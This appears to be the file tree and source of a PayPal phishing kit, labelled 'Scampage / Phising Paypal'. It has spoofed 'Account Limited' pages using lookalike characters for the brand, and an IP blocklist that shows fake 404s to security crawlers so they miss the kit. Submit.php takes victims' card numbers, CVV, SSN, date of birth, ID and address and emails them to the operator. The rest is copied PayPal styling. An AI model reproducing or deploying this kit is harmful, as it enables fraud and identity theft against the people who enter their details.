├── README.md ├── ____YourMail____.php ├── blocker.php ├── detect.php ├── ganti email di file ___YourMail___.txt ├── index.php ├── myaccount ├── MoreArt │ ├── Submit.php │ ├── footer.php │ ├── header.php │ ├── home.php │ ├── index.php │ ├── lib.php │ ├── redirscr.php │ ├── success.php │ ├── tabel_kiri.php │ ├── webscr.php │ └── websrc.php ├── css │ ├── app.css │ ├── coreLayout.css │ ├── eightball.css │ ├── global.css │ ├── pageSalsa.css │ └── summary.css ├── form │ ├── address_info.php │ ├── card_info.php │ ├── info.php │ ├── ip_info.php │ └── success.php ├── icon │ ├── apple-touch-icon.png │ ├── cv_amex_card.gif │ ├── cv_card.gif │ ├── enabled_by_symc_vip.png │ ├── header_logginginAction.gif │ ├── icon_alert_24wx24h.gif │ ├── icon_critalert.gif │ ├── logo.gif │ ├── logo2.gif │ ├── logo_paypal_106x27.png │ ├── paypal_logo.gif │ ├── pp_favicon_x.ico │ ├── sc.png │ ├── scr_check_10x10.gif │ ├── scr_x_10x10.gif │ ├── sprite_header_icons_2x.png │ ├── sprite_ia.png │ ├── sprite_nav_icons.png │ ├── sprite_nav_icons2x.png │ └── sprites_cc_global.png ├── index.php ├── js │ ├── global.js │ ├── jquery.billing.js │ ├── jquery.min.js │ ├── jquery.payment.js │ ├── new.look.js │ └── pageSalsa.js ├── objects │ ├── PayPalIcons-Regular.eot │ ├── PayPalIcons-Regular.ttf │ ├── PayPalIcons-Regular.woff │ ├── btn_bg_default.gif │ ├── btn_bg_sprite.gif │ ├── btn_bg_submit.gif │ ├── nav_sprite.gif │ └── src_ao_bluebg_1x300.gif ├── page │ └── cvv_info_pop&enable_locale.htm └── robots.txt ├── robots.txt └── webapps ├── MoreArt ├── home.php ├── index.php ├── webscr.php └── websrc.php ├── index.php └── robots.txt /README.md: -------------------------------------------------------------------------------- 1 | # scampage 2 | Scampage / Phising Paypal 3 | -------------------------------------------------------------------------------- /____YourMail____.php: -------------------------------------------------------------------------------- 1 | 4 | -------------------------------------------------------------------------------- /blocker.php: -------------------------------------------------------------------------------- 1 | 0) { 7 | header("HTTP/1.0 404 Not Found"); 8 | die("

404 Not Found

The page that you have requested could not be found."); 9 | 10 | } 11 | } 12 | $bannedIP = array("^81.161.59.*", "^66.135.200.*", "^66.102.*.*", "^38.100.*.*", "^107.170.*.*", "^149.20.*.*", "^38.105.*.*", "^74.125.*.*", "^66.150.14.*", "^54.176.*.*", "^38.100.*.*", "^184.173.*.*", "^66.249.*.*", "^128.242.*.*", "^72.14.192.*", "^208.65.144.*", "^74.125.*.*", "^209.85.128.*", "^216.239.32.*", "^74.125.*.*", "^207.126.144.*", "^173.194.*.*", "^64.233.160.*", "^72.14.192.*", "^66.102.*.*", "^64.18.*.*", "^194.52.68.*", "^194.72.238.*", "^62.116.207.*", "^212.50.193.*", "^69.65.*.*", "^50.7.*.*", "^131.212.*.*", "^46.116.*.* ", "^62.90.*.*", "^89.138.*.*", "^82.166.*.*", "^85.64.*.*", "^85.250.*.*", "^89.138.*.*", "^93.172.*.*", "^109.186.*.*", "^194.90.*.*", "^212.29.192.*", "^212.29.224.*", "^212.143.*.*", "^212.150.*.*", "^212.235.*.*", "^217.132.*.*", "^50.97.*.*", "^217.132.*.*", "^209.85.*.*", "^66.205.64.*", "^204.14.48.*", "^64.27.2.*", "^67.15.*.*", "^202.108.252.*", "^193.47.80.*", "^64.62.136.*", "^66.221.*.*", "^64.62.175.*", "^198.54.*.*", "^192.115.134.*", "^216.252.167.*", "^193.253.199.*", "^69.61.12.*", "^64.37.103.*", "^38.144.36.*", "^64.124.14.*", "^206.28.72.*", "^209.73.228.*", "^158.108.*.*", "^168.188.*.*", "^66.207.120.*", "^167.24.*.*", "^192.118.48.*", "^67.209.128.*", "^12.148.209.*", "^12.148.196.*", "^193.220.178.*", "68.65.53.71", "^198.25.*.*", "^64.106.213.*", "^91.103.66.*", "^208.91.115.*", "^199.30.228.*"); 13 | if(in_array($_SERVER['REMOTE_ADDR'],$bannedIP)) { 14 | header('HTTP/1.0 404 Not Found'); 15 | exit(); 16 | } else { 17 | foreach($bannedIP as $ip) { 18 | if(preg_match('/' . $ip . '/',$_SERVER['REMOTE_ADDR'])){ 19 | header('HTTP/1.0 404 Not Found'); 20 | die("

404 Not Found

The page that you have requested could not be found."); 21 | } 22 | } 23 | } 24 | 25 | ?> -------------------------------------------------------------------------------- /detect.php: -------------------------------------------------------------------------------- 1 | country_code; 6 | $nama_negara = $details->country; 7 | $kode_negara = strtolower($negara); 8 | 9 | ?> -------------------------------------------------------------------------------- /ganti email di file ___YourMail___.txt: -------------------------------------------------------------------------------- 1 | ganti email di file ___YourMail___ dengan mail mu -------------------------------------------------------------------------------- /index.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /myaccount/MoreArt/Submit.php: -------------------------------------------------------------------------------- 1 | brand; 9 | $ccbank = $getbank->bank; 10 | $cctype = $getbank->card_type; 11 | $ccklas = $getbank->card_category; 12 | 13 | //+++++++++++++++++++++++++++++++\\ ISI PESAN //+++++++++++++++++++++++++++++++\\ 14 | $message =" 15 | ++=======[ $$ Haurgeulis HunterZ $$ ]=======++ 16 | 17 | .++=====[ CreditCard ]=====++. 18 | Cardholder Name : ".$_POST['cc_holder']." 19 | Card Number : ".$_POST['cc_number']." 20 | Expiration Date : ".$_POST['expdate_month']." / ".$_POST['expdate_year']." 21 | Cvv2 : ".$_POST['cvv2_number']." 22 | BIN/IIN Info : ".$ccbank." - ".$cctype." - ".$ccklas." 23 | Sort Code : ".$_POST['sort_code1']." - ".$_POST['sort_code2']." - ".$_POST['sort_code3']." 24 | .++=========[ End ]=========++. 25 | 26 | .++===[ Address & Info ]===++. 27 | Address Line 1 : ".$_POST['address1']." 28 | Address Line 2 : ".$_POST['address2']." 29 | City/Town : ".$_POST['city']." 30 | State : ".$_POST['state']." 31 | Zip/PostCode : ".$_POST['postal']." 32 | Country : ".$nama_negara." 33 | Phone Number : ".$_POST['phone']." 34 | SSN : ".$_POST['ssn1']." - ".$_POST['ssn2']." - ".$_POST['ssn3']." 35 | ID Number : ".$_POST['id_number']." 36 | DOB : ".$_POST['dob_day']." / ".$_POST['dob_month']." / ".$_POST['dob_year']." 37 | .++=========[ End ]=========++. 38 | 39 | .++=======[ PC Info ]=======++. 40 | From : ".$ip." On ".date('r')." 41 | Browser : ".$_SERVER['HTTP_USER_AGENT']." 42 | .++=========[ End ]=========++. 43 | 44 | ++=======[ $$ Haurgeulis Money HunterZ $$ ]=======++ 45 | "; 46 | //+++++++++++++++++++++++++++++++\\ ISI PESAN //+++++++++++++++++++++++++++++++\\ 47 | 48 | include('../../____YourMail____.php'); 49 | $subject = $ccbrand." ".$cctype." ".$ccklas." (".$nama_negara.")(".$ip.")"; 50 | $headers = "From: CC Spam Result "; 51 | mail($emailku, $subject, $message, $headers); 52 | 53 | include('../form/ip_info.php'); 54 | $subject = $ccbrand." ".$cctype." ".$ccklas." (".$nama_negara.")(".$ip.")"; 55 | $headers = "From: CC Spam Result "; 56 | mail($emailku, $subject, $message, $headers); 57 | 58 | header("LOCATION: redirscr?cmd=_logout&session=".md5(microtime())."&dispatch=".sha1(microtime()).""); 59 | 60 | ?> -------------------------------------------------------------------------------- /myaccount/MoreArt/footer.php: -------------------------------------------------------------------------------- 1 | 15 | 16 | 17 | -------------------------------------------------------------------------------- /myaccount/MoreArt/header.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | ΡayΡal: Summary Limited 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 20 | 21 | 22 | 23 |
24 | 25 | -------------------------------------------------------------------------------- /myaccount/MoreArt/home.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 |
6 |
7 |
8 |

Account Limited

9 |
10 | 11 | 12 | 13 |
14 | 15 |
16 |
17 |

18 | -------------------------------------------------------------------------------- /myaccount/MoreArt/index.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /myaccount/MoreArt/lib.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /myaccount/MoreArt/redirscr.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 |
5 |
6 |
7 | 8 | 9 | 10 |
11 |
12 |

Thank you

13 |
14 |
15 |
16 |
    17 |
  • Account Info
  • 18 |
  • Address Updated
  • 19 |
  • Card Updated
  • 20 |
21 |
22 | 23 | 24 | 25 |
26 |
27 |
28 |
29 |

30 | -------------------------------------------------------------------------------- /myaccount/MoreArt/success.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /myaccount/MoreArt/tabel_kiri.php: -------------------------------------------------------------------------------- 1 |
2 |

What can I do while my account is limited?

3 |
    4 |
  • update your account information
  • 5 |
  • use ΡayΡal logos in your auction listings or on your website
  • 6 |
7 |
8 | 9 |
10 |

What can't I do while my account is limited?

11 |
    12 |
  • send or receive money
  • 13 |
  • withdraw money from your account
  • 14 |
  • close your account
  • 15 |
  • link or remove a card
  • 16 |
  • link or remove a bank account
  • 17 |
  • dispute a transaction
  • 18 |
  • send refunds
  • 19 |
20 |
21 | 22 |
23 |

Secured & Certificate by

24 |
    
25 |
-------------------------------------------------------------------------------- /myaccount/MoreArt/webscr.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 |
6 |
7 |
8 | 9 | 10 | 11 |
12 |
13 |

Account Limited

14 |
15 |
16 |
17 |
    18 |
  • Account Login
  • 19 |
  • Address Updated
  • 20 |
  • Update Card
  • 21 |
22 |
23 |
Complete the steps listed to restore your account access.
24 | 25 | 26 |
27 |
28 |
29 |
30 |

31 | 32 | -------------------------------------------------------------------------------- /myaccount/MoreArt/websrc.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 |
6 |
7 |
8 | 9 | 10 | 11 |
12 |
13 |

Account Limited

14 |
15 |
16 |
17 | 22 |
23 |
Complete the steps listed to restore your account access.
24 | 25 | 26 |
27 |
28 |
29 |
30 |

31 | -------------------------------------------------------------------------------- /myaccount/css/coreLayout.css: -------------------------------------------------------------------------------- 1 | body{background-color:#F8F8F8;margin:0}#stdpage,#page{background-color:#F8F8F8;min-width:1008px;width:100%}div#content,.chargeBack #content{background-color:#fff;-moz-box-shadow:0 1px 4px 0 rgba(0,0,0,0.25);-webkit-box-shadow:0 1px 4px 0 rgba(0,0,0,0.25);box-shadow:0 1px 4px 0 rgba(0,0,0,0.25);-moz-border-radius:5px;-webkit-border-radius:5px;border-radius:5px;clear:both;margin:0 auto 20px;min-height:200px;outline:0;overflow:auto;width:988px}#stdpage #content{background:#fff;margin:0 auto 25px;padding:15px;overflow:auto;position:relative;width:960px}#page #content{background:#fff;margin:0 auto 25px;padding:15px 117px;width:750px}#siteFeedback img{display:none}.welcome .header{padding-top:0}#bheader ul li{margin-bottom:0;margin-left:0}#bheader ul{padding-left:0} -------------------------------------------------------------------------------- /myaccount/css/eightball.css: -------------------------------------------------------------------------------- 1 | .navbar{color:#777;margin-bottom:20px;overflow:visible}#bheader > .navbar-inner{background:none repeat scroll 0 0 #F5F5F5;min-height:3em;padding:9px 20px;width:960px;max-width:1170px;margin:0 auto}#bheader .navBanner{float:left}#bheader .globalNav{list-style:none outside none;margin:0;padding-left:0}.pull-left{float:left}#bheader .globalNav li{float:left;line-height:40px;margin-right:13px;padding-left:20px;background:url(../icon/sprite_ia.png) left -15px no-repeat;list-style:none}.visble-LeftNav{display:none}#bheader .navSecondary{float:right;list-style:none outside none;margin:0}#bfooter{height:69px;border-top:1px solid #fff;margin-bottom:0;position:relative;float:none;clear:both;font-weight:700;background:#f5f5f5;text-shadow:0 1px 1px #fff;color:#666;background-color:#fafafa;background-image:-moz-linear-gradient(top,#fff,#f2f2f2);background-image:-webkit-gradient(linear,0 0,0 100%,from(#fff),to(#f2f2f2));background-image:-webkit-linear-gradient(top,#fff,#f2f2f2);background-image:-o-linear-gradient(top,#fff,#f2f2f2);background-image:linear-gradient(to bottom,#fff,#f2f2f2);background-repeat:repeat-x;border-top:1px solid #d4d4d4;-webkit-border-radius:4px;-moz-border-radius:4px;-webkit-box-shadow:0 1px 4px rgba(0,0,0,0.065);-moz-box-shadow:0 1px 4px rgba(0,0,0,0.065);box-shadow:0 1px 4px rgba(0,0,0,0.065)}#bfooter .navbar{overflow:visible}#bfooter .navbar-inner{width:960px;min-height:40px;margin:0 auto;padding-top:6px;padding-left:20px;padding-right:20px;border-bottom:0;border-left:none;border-radius:0;border-right:0;line-height:150%}#bfooter .navbar-inner .inline{margin:3px 0}#bfooter .navbar-inner .inline:first-child{margin-top:10px;font-size:15px}#bfooter .navbar-inner .inline li{margin:0 13px 0 0}#bfooter ul.inline>li,#bfooter ol.inline>li{display:inline-block;padding-right:5px;padding-left:5px;line-height:20px}#bfooter .navbar-inner .inline li a{color:#666;font-weight:700;text-shadow:0 1px 1px #fff}#bfooter .navbar-inner .inline li a:hover,#bfooter .navbar-inner .inline li a:focus,#bfooter .navbar-inner .inline li a:active,#bfooter .navbar-inner .inline li .active{color:#0079c1;text-decoration:none}#bfooter .inline li.classicLink a{color:#0079c1}#bfooter .navbar-inner .inline{margin:3px 0}#bfooter .navbar-inner .inline li.siteFeedback{margin-right:0;padding-right:0;float:right;background:transparent url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAUCAYAAACNiR0NAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAAadEVYdFNvZnR3YXJlAFBhaW50Lk5FVCB2My41LjEwMPRyoQAAARpJREFUOE/d071Kw2AYxfEUwanqItIuVtHNpUjvoLfRqxCXXoDQwVE6VB3UwQ6KDqUVRcQ7EMVBKHRwEPo1WJzf/g+kUMLzRvDdHH4kPMk5IeFJFFWf9/CJMQYphvjBBw6dc5FFhX30cIIznBsucBofv0DWXzjCEXT+mwVcgqy/UK/TQDJsWcY1yKYXHiMZtvyTQq1DHcmwZRFNkPUXare0DitYnbOGJeieDLJYRxtk/YVdaBdv4pulg3toB3eRRw13+MbEKhMVVvCEd7zFXvECPayFA+i6/qhb7FtlokLZxDa25mygBP1BDo8oQ58iY5XJrDBNDld4QCGemWWSDPvsoIribGaViTkMYQ5DmMMQ5jCEOQxhDv/ORVNEfJkSMINyywAAAABJRU5ErkJggg==) no-repeat 0 5px}#bfooter .navbar-inner .inline li.siteFeedback a{padding-left:20px;color:#0079c1}#bfooter .navbar-inner .inline:last-child{margin-bottom:10px;color:#999;font-size:12px}#bfooter .navbar-inner .inline:last-child a{color:#999}#bfooter .navbar-inner .inline li.copyright:after{content:"\7c";margin-left:20px;font-weight:700}#bfooter ul{padding:0}#bheader .globalNav a{color:#666;font-size:1.077em;font-weight:700;text-shadow:0 1px 1px #FFF;text-decoration:none}#bheader .linkSettings{display:block;width:30px;margin-right:20px;text-indent:-999em;background:url(../icon/sprite_header_icons_2x.png) 0 -186px no-repeat}#bheader .navSecondary li{float:left;line-height:3em;text-align:left;padding-left:0}#bheader .btn,#bheader .btn-group{margin-top:8px}#bheader .btn{display:inline-block;border-style:solid;border-width:1px;-webkit-border-radius:5px;-moz-border-radius:5px;border-radius:5px;font-weight:700;line-height:1.4545em;text-align:center;text-decoration:none;cursor:pointer;color:#fff;text-shadow:0 -1px #00629c;background-color:#00a1ff;background:-moz-linear-gradient(center bottom,#0079c1 0,#0079c1 20%,#00a1ff 100%);background:-webkit-gradient(linear,left bottom,left top,color-stop(0%,#0079c1),color-stop(20%,#0079c1),color-stop(100%,#00a1ff));background:-webkit-linear-gradient(bottom,#0079c1 0,#0079c1 20%,#00a1ff 100%);background:-ms-linear-gradient(bottom,#0079c1 0,#0079c1 20%,#00a1ff 100%);background:-o-linear-gradient(bottom,#0079c1 0,#0079c1 20%,#00a1ff 100%);background:linear-gradient(bottom,#0079c1 0,#0079c1 20%,#00a1ff 100%);border-color:#0079c1 #00588b #004b77;-webkit-box-shadow:0 1px #4dbeff inset;-moz-box-shadow:0 1px #4dbeff inset;box-shadow:0 1px #4dbeff inset;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}#bheader .btn-secondary{color:#333;text-shadow:0 1px #e0e0e0;background-color:#e0e0e0;background:-moz-linear-gradient(center bottom,#bfbfbf 0,#bfbfbf 20%,#e0e0e0 100%);background:-webkit-gradient(linear,left bottom,left top,color-stop(0%,#bfbfbf),color-stop(20%,#bfbfbf),color-stop(100%,#e0e0e0));background:-webkit-linear-gradient(bottom,#bfbfbf 0,#bfbfbf 20%,#e0e0e0 100%);background:-ms-linear-gradient(bottom,#bfbfbf 0,#bfbfbf 20%,#e0e0e0 100%);background:-o-linear-gradient(bottom,#bfbfbf 0,#bfbfbf 20%,#e0e0e0 100%);background:linear-gradient(bottom,#bfbfbf 0,#bfbfbf 20%,#e0e0e0 100%);border-color:#cbcbcb #b2b2b2 #8b8b8b;-webkit-box-shadow:0 1px #ececec inset;-moz-box-shadow:0 1px #ececec inset;box-shadow:0 1px #ececec inset}#bheader .btn-secondary:hover,#bheader .btn-secondary:focus{border-color:#cbcbcb #b2b2b2 #8d8d8d;background-color:#d4d4d4;background-image:-webkit-gradient(linear,0 0,0 100%,from(#e0e0e0),color-stop(20%,#e0e0e0),to(#a5a5a5));background-image:-webkit-linear-gradient(#e0e0e0,#e0e0e0 20%,#a5a5a5);background-image:-moz-linear-gradient(top,#e0e0e0,#e0e0e0 2000%,#a5a5a5);background-image:-o-linear-gradient(#e0e0e0,#e0e0e0 20%,#a5a5a5);background-image:linear-gradient(#e0e0e0,#e0e0e0 20%,#a5a5a5);background-repeat:no-repeat;-moz-box-shadow:0 1px #ebe9ec inset,0 1px rgba(255,255,255,0.2);-webkit-box-shadow:0 1px #ebe9ec inset,0 1px rgba(255,255,255,0.2);box-shadow:0 1px #ebe9ec inset,0 1px rgba(255,255,255,0.2)}#bheader .btn-secondary:active{border-color:#8c8c8c #878787 gray;background-color:#c4c4c4;background-image:-webkit-gradient(linear,0 0,0 100%,from(#ccc),color-stop(20%,#ccc),to(#a5a5a5));background-image:-webkit-linear-gradient(#ccc,#ccc 20%,#a5a5a5);background-image:-moz-linear-gradient(top,#ccc,#ccc 2000%,#a5a5a5);background-image:-o-linear-gradient(#ccc,#ccc 20%,#a5a5a5);background-image:linear-gradient(#ccc,#ccc 20%,#a5a5a5);background-repeat:no-repeat;-moz-box-shadow:0 1px #ebe9ec inset,0 1px rgba(255,255,255,0.2);-webkit-box-shadow:0 1px #ebe9ec inset,0 1px rgba(255,255,255,0.2);box-shadow:0 2px 4px #737373 inset,0 1px rgba(255,255,255,0.2)}#bheader .btn-mini{font-size:.8461em;min-width:44px;padding:4px 8px}#bfooter .navbar-inner .inline li a{text-decoration:none}#bfooter .inline li.classicLink a{color:#0079C1;text-decoration:none}#bfooter .navbar-inner .inline li.siteFeedback a{color:#0079C1;padding-left:20px}.navbar-inner:before,.navbar-inner:after{content:"";display:table;line-height:0;display:table;line-height:0;display:table;line-height:0}.navbar-inner:after{clear:both}.navbar-inner:before,.navbar-inner:after{content:"";display:table;line-height:0}.navbar-inner:after{clear:both}.navbar-inner:before,.navbar-inner:after{content:"";display:table;line-height:0}.navbar-inner:after{clear:both}.navbar-inner:before,.navbar-inner:after{content:"";display:table;line-height:0}#bfooter .globalNav a:hover,#bfooter .globalNav a:focus,#bfooter .globalNav a:active,#bfooter .globalNav .active{color:#0666B3;text-decoration:none}#bfooter .navbar-inner .inline li a:hover,#bfooter .navbar-inner .inline li a:focus,#bfooter .navbar-inner .inline li a:active,#bfooter .navbar-inner .inline li .active{color:#0666B3;text-decoration:none}.footer .navbar-inner .inline:last-child a{color:#999}#bheader{color:#333;font-family:Arial,Helvetica Neue,helvetica,sans-serif;font-size:.875rem;font-weight:400;line-height:3em;position:relative;background:#F5F5F5;border-bottom:1px solid #FFF;text-shadow:0 1px #FFF;-webkit-box-shadow:0 2px #d7d7d7;-moz-box-shadow:0 2px #d7d7d7;box-shadow:0 2px #d7d7d7}#bheader > .navbar-inner .brand{-moz-box-sizing:border-box;float:left;margin-left:0;color:#777;display:block;float:left;font-size:20px;font-weight:200;padding:0 10px;text-shadow:0 1px 0 #FFF}#bheader .navbar-inner .brand img{margin-top:9px}#bheader ul{padding:0}#bfooter span{display:inline}#navFull{display:none} -------------------------------------------------------------------------------- /myaccount/css/global.css: -------------------------------------------------------------------------------- 1 | html{overflow-y:scroll}body{margin:0 5px;padding:0;color:#333;background:#fff;font:75%/normal Arial,Helvetica,sans-serif}h1,h2,h3,h4,h5,h6{margin:.1em 0;line-height:normal!important}h1{color:#C88039;font-size:1.33em}h2{color:#C88039;font-size:1.167em}h3{color:#333;font-size:1.167em}h4{color:#333;font-size:1em}h5,h6{font-size:1em}a{color:#084482;text-decoration:underline}a.button{position:relative;width:auto;border:1px solid #bfbfbf;border-right-color:#908d8d;border-bottom-color:#908d8d;margin-right:10px;padding:2px .6em;background:#e1e1e1 url(../objects/btn_bg_default.gif) left center repeat-x;color:#000;font-weight:400!important;text-decoration:none}a.button:active{border:1px solid #908d8d;border-right-color:#afafaf;border-bottom-color:#afafaf}a.button:hover{cursor:pointer}a.button.primary{background:#ffa822 url(../objects/btn_bg_submit.gif) left center repeat-x;border:1px solid #d5bd98;border-right-color:#935e0d;border-bottom-color:#935e0d}a.button.primary:active{border:1px solid #935e0d;border-right-color:#d5bd98;border-bottom-color:#d5bd98}a img{border:0}p{margin:1em 0}ul,ol,dl{margin:1.6em 0;padding:0}ul li,ol li,ol ul li{margin-bottom:.8em;margin-left:1.25em;padding-left:.2em}li ul,li ol{margin:1.25em 0}ul ul,ol ul{list-style:disc}ol{margin-left:1.2em}ol li{padding-left:.4em}ol ol{list-style:lower-alpha}li ol{margin-left:.7em}ol ol ol{list-style:lower-roman}ol ol ol ol{list-style:decimal}dt{margin:0;padding:0}dd{margin:0 0 0 1.8em}blockquote{margin:1em}em{font-style:italic}strong{font-weight:700}dfn,var{font-style:normal}code,kbd,samp{font:1em "Courier New",Courier,monospace}q:before,q:after{content:""}cite{font-style:normal}cite span{display:block}abbr,acronym{border:none;color:#084482;text-decoration:underline;cursor:pointer}form{margin:0;padding:0}fieldset{margin:1em 0;border:0;padding:0}legend{position:relative;padding:0;color:#333;font-weight:700}label{display:block}input,select,textarea{border:1px solid #adc2d6;font:1em Arial,Helvetica,sans-serif}input,textarea{padding:2px}textarea{vertical-align:top}input[type=checkbox],input[type=radio],input[type=hidden]{border:none;padding:0;margin-right:.25em}input.checkbox,input.radio,input.hidden,label.checkbox input,label.radio input{border:none;padding:0}button{padding:1px 10px}button,input.button{width:auto!important;margin-right:10px;border:1px solid #bfbfbf;border-right-color:#908d8d;border-bottom-color:#908d8d;padding:1px .5em;background:#e1e1e1 url(../objects/btn_bg_sprite.gif) left 82.5% repeat-x;color:#000;overflow:visible}button:active,input.button:active{border:1px solid #908d8d;border-right-color:#afafaf;border-bottom-color:#afafaf}button:hover,input.button:hover{cursor:pointer}button.primary,input.button.primary{border:1px solid #d5bd98;border-right-color:#935e0d;border-bottom-color:#935e0d;background:#ffa822 url(../objects/btn_bg_sprite.gif) left 17.5% repeat-x}button.primary:active,input.button.primary:active{border:1px solid #935e0d;border-right-color:#d5bd98;border-bottom-color:#d5bd98}button[disabled],input.button[disabled]{border:1px solid #ccc;background:#eee;color:#b3b3b3}button[disabled]:hover,input.button[disabled]:hover{cursor:default}button.disabled,input.button.disabled{border:1px solid #ccc;background:#eee;color:#b3b3b3}button.disabled:hover,input.button.disabled:hover{cursor:default}button.mini,input.mini,a.mini{font-size:.9em}table{width:auto;margin:1em 0;border:none;border-collapse:collapse}table caption{margin:1em 0 0;font-weight:700;text-align:left}table th{padding:.2em .4em;background-color:#fff;font-weight:700;line-height:normal;text-align:center;vertical-align:top}table td{padding:.2em .4em;background-color:#fff;font-weight:400;line-height:1.2em;text-align:left;vertical-align:top}hr{display:none}#page{position:relative;width:760px;margin:0 auto}#stdpage{position:relative;width:960px;margin:0 auto}#pge{position:relative;width:960px;margin:0 auto}#header{position:relative;height:100px}#header.std{z-index:9;height:130px}#header.std.secondary{height:157px}#header.notab{height:106px}#header h1{position:absolute;padding:24px 0 24px 10px}#header ul{margin:0;padding:0;list-style-type:none}#header ul li{margin:0}div#header.lightweight{height:98px;margin-bottom:10px;border-bottom:6px solid #1A3665}#searchForm{float:right;width:167px;padding:4px 0 5px 20px}#searchForm legend{display:none}#searchForm label{position:absolute;top:0;left:-500em;width:1px;height:1px;overflow:hidden;text-indent:-9999em;line-height:0}#searchForm fieldset{margin:0}#searchForm input{margin:0;padding:2px;font-size:.9em}#searchForm input#searchBox{width:95px}#searchForm input.button{margin-left:2px;margin-right:0}#navGlobal{float:right;margin-top:.45em;font-size:.9em;text-align:right}#navGlobal li{display:inline;border-right:1px solid #333;padding-left:.9em}#navGlobal li a{margin-right:1em}#navGlobal .new{padding-right:.5em;font-weight:700;font-style:italic;color:#ff7900}#navGlobal .last{border:none}#navPrimary{clear:both;z-index:2;position:absolute;top:100px;width:100%;min-height:6px}#navPrimary.empty{top:92px;height:6px;background:url(../objects/nav_sprite.gif) left 0 repeat-x}#navPrimary ul{overflow:hidden;margin:0;padding:0 0 0 10px;background:url(../objects/nav_sprite.gif) left 1.8em repeat-x;list-style-type:none}#navPrimary ul.secondary{margin-bottom:2em}#navPrimary ul li{float:left;margin:.45em .45em 0 0;padding:.27em .9em;background:#1A4773 url(../objects/nav_sprite.gif) left -75px repeat-x}#navPrimary ul li:hover,#navPrimary ul li.hover{background:#1A4773 url(../objects/nav_sprite.gif) left -197px repeat-x}#navPrimary ul li a{display:block;color:#fff;font-weight:700;text-decoration:none;text-align:center}#navPrimary ul li.active{margin-top:0;border-left:1px solid #ccc;border-right:1px solid #ccc;padding:.7em .9em .5em;background:#f8f8f8 url(../objects/nav_sprite.gif) left -136px repeat-x}#navPrimary ul li.active:hover,#navPrimary ul li.active{background:#f8f8f8 url(../objects/nav_sprite.gif) left -136px repeat-x}#navPrimary ul li.active a{color:#333}#navPrimary ul li ul{display:none}#navPrimary ul li.active ul{display:block;overflow:visible;width:100%;position:absolute;top:2.3em;left:0;padding:0;background:url(../objects/nav_sprite.gif) left -2.15em repeat-x}#navPrimary ul li.active ul li{margin:0;padding:.45em .9em .8em;background:transparent none}#navPrimary ul li.active ul li a{display:block;color:#1C4266;font-weight:400}#navPrimary ul li.active ul li a:hover,#navPrimary ul li.active ul li a:focus{text-decoration:underline}#navPrimary ul li.active ul li.active:hover,#navPrimary ul li.active ul li.active{border:none;background:none}#navPrimary ul li.active ul li.active:hover a{text-decoration:underline}#navPrimary ul li.active ul li.active a{color:#333;font-weight:700}#navPrimary ul li.active ul li.active:hover ul li a{text-decoration:none}#navPrimary ul li ul li ul,#navPrimary ul li.active ul li ul{display:none}#navPrimary ul li.active ul li:hover ul,#navPrimary ul li.active ul li.hover ul{display:block;z-index:10;width:auto;left:auto;margin:-.1em 0 0 -.9em;border:1px solid #ccc;border-top:none;padding:0 1em;background:#fff}#navPrimary ul li.active ul li:hover ul li,#navPrimary ul li.active ul li.hover ul li{float:none;margin:1em 0;padding:0}#navPrimary ul li.active ul li:hover ul li a,#navPrimary ul li.active ul li.hover ul li a{display:inline;text-align:left}#navPrimary ul li.active ul li:hover ul li a:hover,#navPrimary ul li.active ul li.hover ul li a:hover{text-decoration:underline}#navPrimary ul li.active ul li.active ul li a{color:#1C4266;font-weight:400}#sectionBreak,div.sectionBreak{width:100%;background:transparent url(/en_US/i/pui/core/nav_main_bg.gif) repeat-x scroll left bottom;height:6px}#rosetta{position:absolute;top:40px;right:5px;z-index:11;width:180px;text-align:right}#rosetta fieldset{margin:0}#rosetta legend{display:block;position:absolute;top:0;left:-500em;width:1px;height:1px;overflow:hidden;text-indent:-9999em;line-height:0}#rosetta label{display:none}#rosetta input.button{margin:0 0 0 2px;font-weight:700}a.skip:active,a.skip:focus{width:auto!important;height:auto!important;left:10px!important;top:80px!important;line-height:normal!important;text-indent:0!important}#html-rosetta-container{position:absolute;height:1em;width:11em;right:0;z-index:11}#html-rosetta{background:#fff;position:absolute;right:.7em;top:3.7em;width:11em;font-size:.9em;z-index:11}#html-rosetta p{text-align:right;text-decoration:underline;cursor:pointer;color:#084482;margin:0;padding-right:1.1em;background:url(/en_US/i/icon/icon_dropdown.gif) 100% .6em no-repeat}#html-rosetta ul{width:10.8em;border:1px solid #ccc;margin:.4em 0 0;padding:.2em 0}#html-rosetta li{list-style-type:none;margin:0}#html-rosetta li a,#html-rosetta li a:visited{display:block;padding:.2em .7em;color:#000;text-decoration:none;zoom:1}#html-rosetta li a:hover{background:#084482;color:#fff}#html-rosetta div{position:relative;height:0;margin-top:.3em;overflow:hidden}#html-rosetta ul{position:absolute;bottom:0}#content{clear:both;overflow:auto;margin-top:.5em;padding:0 5px}#stdpage #content{padding:0 10px}#page #content{padding:0 5px}#page #content.sideposleft #main{float:right;width:560px}#page #content.sideposleft #sidebar,#page #content.sideposleft #login{float:left;width:180px}#page #content.sideposright #main{float:left;width:560px}#page #content.sideposright #sidebar,#page #content.sideposright #login{float:right;width:180px}#stdpage #content.sideposleft #main{float:right;width:700px}#stdpage #content.sideposleft #sidebar,#stdpage #content.sideposleft #login{float:left;width:220px}#stdpage #content.sideposright #main{float:left;width:700px}#stdpage #content.sideposright #sidebar,#stdpage #content.sideposright #login{float:right;width:220px}#pge #content{padding:0 10px}#pge #content.sideposleft #main,#pge #content.sideposright #sidebar{float:right}#pge #content.sideposright #main,#pge #content.sideposleft #sidebar{float:left}#pge #content.sideposleft #main,#pge #content.sideposright #main{width:74.47%}#pge #content.sideposleft #sidebar,#pge #content.sideposright #sidebar{width:23.4%}#pge 